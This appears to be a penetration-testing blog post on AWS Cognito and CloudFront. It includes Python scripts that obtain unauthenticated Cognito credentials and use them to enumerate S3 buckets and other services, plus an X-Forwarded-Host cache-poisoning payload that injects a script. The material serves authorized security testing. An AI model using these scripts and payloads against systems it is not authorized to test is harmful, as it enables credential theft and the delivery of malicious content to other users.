Friday, February 14, 2020

A practical guide to testing the security of Amazon Web Services (Part 3: AWS Cognito and AWS CloudFront)

This is the last part of our three-post journey through the main Amazon Web Services and their security.

In the previous two parts we discussed two of the most widely used Amazon services, namely AWS S3 and AWS EC2. If you haven't read them yet, you can find them here: Part 1 and Part 2.

In this final post we discuss two additional services that you might encounter when analyzing the security of a web application: AWS Cognito and AWS CloudFront.
These are two very different services that support web applications in two specific areas:

  • AWS Cognito aims at providing an access control system that developers can implement in their web applications. 
  • AWS CloudFront is a Content Delivery Network (CDN) that delivers your data to the users with low latency and high transfer speed.


AWS Cognito



AWS Cognito provides developers with an authentication, authorization, and user management system that can be integrated into web applications. It is divided into two components:

  • user pools;
  • identity pools. 
Quoting AWS documentation on Cognito:
User pools are user directories that provide sign-up and sign-in options for your app users. Identity pools enable you to grant your users access to other AWS services. You can use identity pools and user pools separately or together.
From a security perspective, we are particularly interested in identity pools as they provide access to other AWS services we might be able to mess with.

Identity pools are identified by an ID that looks like this:
 us-east-1:1a1a1a1a-ffff-1111-9999-12345678

A web application queries AWS Cognito with the proper identity pool ID in order to obtain temporary, limited-privilege AWS credentials to access other AWS services.

An identity pool also allows you to specify a role for users that are not authenticated.
Amazon documentation states:
Unauthenticated roles define the permissions your users will receive when they access your identity pool without a valid login.
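
If you also have credentials for the AWS account under test (for example during a white-box assessment), a quick way to check whether unauthenticated identities are enabled is to query the identity pool configuration directly. The following is a minimal sketch using boto3; it assumes credentials holding the cognito-identity:DescribeIdentityPool permission and uses a placeholder pool ID in the format shown above.

# Minimal white-box sketch: requires boto3 and credentials holding the
# cognito-identity:DescribeIdentityPool permission.
import boto3

client = boto3.client('cognito-identity', region_name='us-east-1')

# Replace with the identity pool ID under test (placeholder value).
pool = client.describe_identity_pool(
    IdentityPoolId='us-east-1:1a1a1a1a-ffff-1111-9999-12345678'
)

# AllowUnauthenticatedIdentities is True when an unauthenticated role is enabled.
print("Pool name: %s" % pool['IdentityPoolName'])
print("Unauthenticated identities allowed: %s" % pool['AllowUnauthenticatedIdentities'])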




This is clearly something worth checking during the assessment of a web application that takes advantage of AWS Cognito.

In fact, let's consider the scenario of a web application that grants access to AWS S3 buckets upon proper authentication, with the identity pool providing temporary credentials for the bucket.

Now suppose that the identity pool has also been configured to grant unauthenticated identities the same privileges to access the AWS S3 buckets.

In such a situation, an attacker would be able to obtain the application's temporary AWS credentials without authenticating.

The following Python script tries to obtain unauthenticated credentials and uses them to list the AWS S3 buckets.

In the script, just replace the IDENTITY_POOL placeholder with the identity pool ID identified during the assessment.


# NB: This script requires boto3.
# Install it with:
# pip install boto3
import boto3
from botocore.exceptions import ClientError

# Replace with the identity pool ID identified during the assessment.
IDENTITY_POOL = "[IDENTITY_POOL]"

try:
    # Request an identity ID from the identity pool (no authentication).
    # The region must match the one in the identity pool ID.
    client = boto3.client('cognito-identity', region_name="us-east-2")
    resp = client.get_id(IdentityPoolId=IDENTITY_POOL)

    print("\nIdentity ID: %s" % resp['IdentityId'])
    print("\nRequest ID: %s" % resp['ResponseMetadata']['RequestId'])

    # Exchange the identity ID for temporary AWS credentials.
    resp = client.get_credentials_for_identity(IdentityId=resp['IdentityId'])
    secretKey = resp['Credentials']['SecretKey']
    accessKey = resp['Credentials']['AccessKeyId']
    sessionToken = resp['Credentials']['SessionToken']
    print("\nSecretKey: %s" % secretKey)
    print("\nAccessKey ID: %s" % accessKey)
    print("\nSessionToken %s" % sessionToken)

    # Use the temporary credentials to list all S3 bucket names.
    s3 = boto3.resource('s3',
                        aws_access_key_id=accessKey,
                        aws_secret_access_key=secretKey,
                        aws_session_token=sessionToken,
                        region_name="eu-west-1")
    print("\nBuckets:")
    for b in s3.buckets.all():
        print(b.name)

except (ClientError, KeyError):
    print("No Unauth")
    exit(0)




If unauthenticated user access to AWS S3 buckets is allowed, your output should look something like this:


Identity ID: us-east-2:ddeb887a-e235-41a1-be75-2a5f675e0944

Request ID: cb3d99ba-b2b0-11e8-9529-0b4be486f793

SecretKey: wJE/[REDACTED]Kru76jp4i

AccessKey ID: ASI[REDACTED]MAO3

SessionToken AgoGb3JpZ2luELf[REDACTED]wWeDg8CjW9MPerytwF

Buckets:
mindeds3log
mindeds3test01
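
Listing S3 buckets is just one example of what the temporary credentials may allow. A useful next step is to check which IAM role they map to and whether other services are reachable. The following is a minimal sketch: paste in the credentials printed above; the DynamoDB call is only an illustrative probe and will fail unless the unauthenticated role actually grants that permission.

# Minimal follow-up sketch: reuse the temporary credentials obtained above.
import boto3
from botocore.exceptions import ClientError

accessKey = "[ACCESS_KEY_ID]"      # AccessKey ID from the previous output
secretKey = "[SECRET_KEY]"         # SecretKey from the previous output
sessionToken = "[SESSION_TOKEN]"   # SessionToken from the previous output

session = boto3.Session(
    aws_access_key_id=accessKey,
    aws_secret_access_key=secretKey,
    aws_session_token=sessionToken,
    region_name="us-east-2",
)

# GetCallerIdentity needs no special permissions and reveals the assumed role ARN.
print(session.client('sts').get_caller_identity()['Arn'])

# Example probe: list DynamoDB tables (fails with AccessDenied if not permitted).
try:
    print(session.client('dynamodb').list_tables()['TableNames'])
except ClientError as e:
    print("DynamoDB not accessible: %s" % e.response['Error']['Code'])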



AWS CloudFront

AWS CloudFront is Amazon's Content Delivery Network (CDN) service, whose purpose is to improve the performance of delivering content from web applications.
The following images depict the basics of how CloudFront works.



The browser requests resource X from the edge location.
If the edge location has a cached copy of resource X it simply sends it back to the browser.

The following picture describes what happens if resource X is not cached in the edge location.





  • The browser requests resource X from the edge location, which doesn't have a cached version. 
  • The edge location thus requests resource X from its origin, meaning the place where the original copy of resource X is stored (this is decided when configuring CloudFront for a given domain). 
  • The origin can be, for example, an Amazon service such as an S3 bucket, or a server outside of Amazon. 
  • The edge location receives resource X, stores it in its cache for future use, and finally sends it back to the browser (this round trip can be observed from the client side, as sketched below). 
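
CloudFront reports cache hits and misses in its X-Cache response header ("Hit from cloudfront" vs "Miss from cloudfront"). The following minimal sketch uses the Python requests library against a hypothetical CloudFront-backed URL to observe this from the client side:

# Minimal sketch: request the same resource twice and compare CloudFront's
# X-Cache header ("Miss from cloudfront" vs "Hit from cloudfront").
# The URL is a hypothetical example of a CloudFront-backed resource.
import requests

url = "https://dxxxxxxxxxxxxx.cloudfront.net/resource-x.png"

for attempt in (1, 2):
    r = requests.get(url)
    print("Attempt %d: status=%d, X-Cache=%s" % (
        attempt, r.status_code, r.headers.get("X-Cache", "not present")))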

This simple caching mechanism can be very helpful when it comes to improving the performance of a web application, but it might also hide some unwanted behavior.

As recently shown by James Kettle, web applications that rely on caching for dynamic pages should be aware that such caching functionality can be abused to deliver malicious content to users, a.k.a. cache poisoning.
Briefly, as described by Kettle in his post, web cache systems need a way to uniquely identify a request so that they don't have to keep contacting the origin location.
To do so, a few parts of an HTTP request, called cache keys, are used to fully identify the request. Whenever a cache key changes, the caching system considers it a different request and, if it doesn't have a cached copy, contacts the origin location.
The basic idea behind web cache poisoning is to find an HTTP parameter that is not a cache key but that can be used to manipulate the content of a web page. When such a parameter is found, an attacker might be able to get a response containing a malicious payload cached and, whenever other users perform the same request, the caching system will answer with the cached version containing the malicious payload.

Let's consider the following simple request taken from James' post:


GET /en?cb=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: canary

HTTP/1.1 200 OK
Cache-Control: public, no-cache

<meta property="og:image" content="https://canary/cms/social.png" />



The value of X-Forwarded-Host has been used to generate an Open Graph URL inside a meta tag in the HTML of the web page. By replacing canary with a."><script>alert(1)</script> it's possible to break out of the attribute and inject an alert box into the page.


GET /en?cb=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: a."><script>alert(1)</script>



HTTP/1.1 200 OK
Cache-Control: public, no-cache

<meta property="og:image" content="https://a."><script>alert(1)</script>/cms/social.png" />

However, in this case, X-Forwarded-Host is not used as a cache key. This means that the response containing the alert code can be stored in the web cache and will be served to other users in the future. As James' post makes clear, X-Forwarded-Host and X-Forwarded-Server are two widely used HTTP headers that are not part of the set of cache keys, which makes them good candidates for cache poisoning attacks. James has also developed a Burp plug-in called param-miner that can be used to identify HTTP parameters that are not used as cache keys.
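
Before reaching for param-miner, a quick manual probe of a single endpoint can be done by hand: send a request with a unique cache buster and a canary X-Forwarded-Host value, then repeat the same request without the header and check whether the canary is still reflected. A minimal sketch against a hypothetical target URL could look like this:

# Minimal sketch of a manual cache poisoning probe (hypothetical target URL):
# 1. send a request with a unique cache buster and a canary X-Forwarded-Host;
# 2. repeat the same request without the header;
# if the canary is still reflected, the header is unkeyed and the response
# generated from it has been cached.
import random
import requests

target = "https://www.example.com/en"   # hypothetical target
canary = "canary%d.example.net" % random.randint(0, 10**8)
cache_buster = {"cb": str(random.randint(0, 10**8))}

# Step 1: poison attempt with the canary header.
r1 = requests.get(target, params=cache_buster,
                  headers={"X-Forwarded-Host": canary})

# Step 2: same cache key, no header. A reflected canary means the cached
# response was generated from our header.
r2 = requests.get(target, params=cache_buster)

print("Canary reflected in first response: %s" % (canary in r1.text))
print("Canary served from cache to others: %s" % (canary in r2.text))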

Conclusion

This post concludes our journey into the main Amazon Web Services and how to account for them when testing the security of web applications.
It is undeniable that AWS provides a comprehensive solution that companies can take advantage of instead of having to manage the entire infrastructure themselves. However, companies remain in charge of configuring the services they decide to use, so it becomes crucial to test and verify those configurations.
